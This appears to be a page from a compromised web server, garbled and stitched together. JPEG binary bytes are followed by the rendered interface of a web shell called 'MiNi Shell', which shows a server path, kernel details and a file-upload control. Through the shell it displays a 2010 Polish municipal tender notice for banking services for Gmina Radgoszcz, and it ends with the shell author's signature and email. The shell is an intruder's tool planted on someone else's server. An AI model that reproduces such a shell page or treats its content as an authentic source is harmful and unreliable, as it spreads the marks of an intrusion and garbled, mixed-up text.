JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/292672-N-2010.html

<p class="kh_header"><b>Radgoszcz: Obsługa bankowa budżetu Gminy Radgoszcz
w latach 2010 - 2014
- sprawa znak F-3360/53/10</b><br>
<b>Numer ogłoszenia: 292672 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radgoszcz , pl. św Kazimierza 7-8, 33-207 Radgoszcz, woj. małopolskie, tel. 0-14 641-41-39, faks 0-14 641-46-61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy Radgoszcz
w latach 2010 - 2014
- sprawa znak F-3360/53/10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy wyboru Wykonawcy dla zadania pn.: Obsługa bankowa budżetu Gminy Radgoszcz w latach 2010 -2014

A. Obsługa bankowa budżetu Gminy Radgoszcz w okresie od 1 listopada 2010 r. do 
31 października 2014 r. obejmuje:

1. Otwarcie i prowadzenie rachunku bieżącego budżetu Gminy oraz rachunków jednostek organizacyjnych Gminy Radgoszcz (dotyczy to wszystkich rachunków otwieranych podczas obowiązywania umowy na obsługę budżetu Gminy Radgoszcz) w tym wpłaty i wypłaty gotówkowe i realizacje czeków.
2. Elektroniczna obsługa rachunków typu Home banking lub równoważny, umożliwiająca w szczególności:

2.1.	uzyskiwanie w czasie rzeczywistym informacji o wszystkich operacjach i saldach na rachunku Gminy Radgoszcz,
2.2.	przeszukiwanie zbioru wszystkich operacji na wszystkich rachunkach wg rodzaju operacji, nazwy kontrahenta, daty, okresu, kwoty i innych kryteriów możliwych do wyodrębnienia w zbiorze operacji,
2.3.	wywołanie dowolnej operacji wg ww. kryteriów,
2.4.	składanie poleceń przelewu z wszystkich rachunków,
2.5.	obsługa systemu na platformie internetowej,
2.6.	autoryzacja operacji poprzez podpis elektroniczny,
2.7.	monitorowanie operacji i sporządzanie z całego okresu obsługi wyciągów dla wszystkich operacji.

3. Uznawanie i obciążanie rachunków w dniu operacji.
4. Wykonywanie poleceń przelewów złożonych do godz. 13:00 w tym samym dniu, a poleceń złożonych po godz. 13:00 w dniu następnym do godz. 11:00.
5. Przelewy dokonywane na rachunki w oddziale banku oraz innych oddziałach i filiach dokonywane będą bez opłat.
6. Oprocentowanie środków pieniężnych na wszystkich obsługiwanych rachunkach.
7. Zainstalowanie na koszt banku programu komputerowego umożliwiającego realizację zleceń płatniczych składanych za pomocą elektronicznych nośników informacji, przy założeniu, że zlecenie płatnicze składane za pomocą systemu zrealizowane będzie w tym samym dniu roboczym, z wyłączeniem sobót, niedziel i dni wolnych od pracy (min. 5 stanowisk).
8. W przypadku awarii systemu lub braku łączności z bankiem - przyjmowanie i wykonywanie zleceń płatniczych składanych na zewnętrznych nośnikach danych lub w formie papierowej.
9. Bezpłatne przeszkolenie pracowników w zakresie zainstalowanego systemu płatniczego.
10. Pobieranie prowizji i opłat za prowadzenie rachunków z rachunków wskazanych przez Gminę.
11. Sporządzanie codziennych wyciągów bankowych i dostarczenie ich do siedziby Zamawiającego w terminie do dwóch dni roboczych.
12. Przyjmowanie lokat terminowych.
13. Odbiór i dostarczenie gotówki do siedziby Zamawiającego po uprzednim uzgodnieniu.

B. Wymagania dodatkowe:
1. Bank nie będzie pobierał z tytułu obsługi bankowej Gminy Radgoszcz żadnych innych opłat niż określone w specyfikacji.
2. Bank zawrze umowy na prowadzenie obsługi bankowej na warunkach zaoferowanych 
w niniejszym przetargu ze wszystkimi jednostkami organizacyjnymi Gminy Radgoszcz.
3. Wykonawca zobowiązuje się do przeniesienia bazy danych z obecnie wykorzystywanego systemu bankowości elektronicznej do systemu proponowanego przez bank. 
4. Stosownie do art. 34 ust. 3 ustawy z dnia 13 listopada 2003 r. o dochodach jednostek samorządu terytorialnego Bank otworzy podstawowy rachunek bankowy budżetu celem przekazania informacji Ministrowi Finansów o nowym numerze rachunku w ustawowym terminie. Rachunek pozostanie nieaktywny do dnia 31 października 2010 roku.

C. Informacje ogólne
1. Wykonawca winien zapoznać się z całą Specyfikacją Istotnych Warunków Zamówienia.
2. Każdy Wykonawca może złożyć tylko jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej warianty spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę. Nie dopuszcza się składania ofert częściowych.
3. Żadna część zamówienia nie może być powierzona podwykonawcom za wyjątkiem powierzenia podwykonawcy dostawy i odbioru gotówki do siedziby Zamawiającego.
4. Zamawiający nie przewiduje zawarcia umowy ramowej.
5. Zamawiający nie dopuszcza składania ofert wariantowych.
6. Zamawiający nie przewiduje prowadzenia aukcji elektronicznej.
7. Wszelkie koszty związane z przygotowaniem oferty ponosi Wykonawca.
8. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
9. Rozliczenia między Zamawiającym a Wykonawcą będą dokonywane w PLN.
10. Ofertę należy sporządzić w formie pisemnej.
11. Sposób uzyskania specyfikacji istotnych warunków zamówienia:

Na wniosek Wykonawcy Specyfikację Istotnych Warunków Zamówienia można uzyskać: w siedzibie Zamawiającego, pokój nr 14, I - piętro - bezpłatnie. SIWZ dostępna jest także na stronie internetowej: www.radgoszcz.pl lub www.malopolska.pl/bip/radgoszcz

Informacje Zamawiającego dot. budżetu i dotychczasowej obsługi budżetu:
1. w roku 2010: planowane dochody - 26 228 132,61zł, planowane wydatki - 29 541 406,61 zł, (plan wg stanu na dzień 10 września 2010 .)                                         
2. Jednostki organizacyjne Gminy Radgoszcz objęte usługą: Urząd Gminy Radgoszcz, Gminny Ośrodek Pomocy Społecznej w Radgoszczy, Gminna Biblioteka Publiczna 
w Radgoszczy, Gminny Zakład Gospodarki Komunalnej w Radgoszczy, Gminny Zespół Obsługi Szkól i Przedszkoli Publicznych w Radgoszczy, Zespół Szkół Publicznych 
w Radgoszczy, Zespół Szkół Publicznych w Luszowicach, Przedszkole Publiczne 
w Luszowicach, Przedszkole Publiczne w Radgoszczy, Szkoła Podstawowa  w Zarzeczu Dużym, Szkoła Podstawowa w Małcu.

Inne informacje:
1. Liczba rachunków - 34.
2. Średnia miesięczna liczba przelewów w formie elektronicznej na rachunki w banku 
(w szt.) - 950.
3. Średnia miesięczna kwota operacji bezgotówkowych na rachunki w banku -2 800 000 zł.
4. Średnia miesięczna liczba przelewów w formie elektronicznej na rachunki w innych bankach (w szt.) - 830.
5. Średnia miesięczna kwota operacji bezgotówkowych na rachunki w innych bankach - 1 600 000 zł.
6. Średnia łączna wartość wypłat gotówkowych miesięcznie - 123 000 w zł.
7. Średnia łączna ilość wypłat gotówkowych miesięcznie - 96.
8. Średnia łączna wartość wpłat gotówkowych miesięcznie - 85 000 zł.
9. Średnia łączna ilość wpłat gotówkowych miesięcznie - 46.
10. Obsługa bankowa za pomocą systemu elektronicznego w wersji 1 stanowiskowej na 5 stanowiskach.
11. Wysokość osadów w ujęciu średniomiesięcznym - 900 000 zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał uprawnienia do wykonywania czynności bankowych zgodnie z ustawą z dnia 29 sierpnia 1997 roku Prawo bankowe (Dz. U. z 2002 r. Nr 72, poz. 665 z późn. zm.).
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia wg załącznika nr 2 i dokumentu, o którym mowa w pkt. VI. ppkt. 4 i 5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby bank (Wykonawca) posiadał, co najmniej 1 oddział lub filię (banku) oddalony o nie więcej niż 15 km od siedziby Zamawiającego. 
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia wg załącznika nr 2 i 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby bank (Wykonawca) posiadał, co najmniej 1 oddział lub filię (banku) oddalony o nie więcej niż 15 km od siedziby Zamawiającego oraz bankomat. 
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia wg załącznika nr 2 i 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby bank (Wykonawca) posiadał, co najmniej 1 oddział lub filię (banku) oddalony o nie więcej niż 15 km od siedziby Zamawiającego. 
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia wg załącznika nr 2 i 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk OFERTA, który należy sporządzić ściśle wg wzoru druku załączonego przez Zamawiającego - załącznik Nr 1do SIWZ.
2. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.
3. Oświadczenie Wykonawcy o braku podstaw do wykluczenia z art. 24 - załącznik nr 3 do SIWZ.
4. Zezwolenie komisji nadzoru bankowego lub inny dokument upoważniający do wykonywania czynności bankowych (zezwolenie na utworzenie i rozpoczęcie przez Bank działalności),
5. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Banki państwowe mają przedłożyć statut oraz dokument powołujący radę nadzorczą i zarząd. Osoby fizyczne składają oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
6. Zezwolenia lub licencję na prowadzenie działalności bankowej, o której mowa w Ustawie Prawo bankowe.
7. Oświadczenie o posiadaniu, co najmniej 1 oddziału lub filii (banku) oddalonego o nie więcej niż 15 km od siedziby Zamawiającego - załącznik nr 4 do SIWZ.
8. W przypadku podmiotów występujących wspólnie do oferty należy dołączyć umowę regulującą współpracę tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 09:00, miejsce: Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 11 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com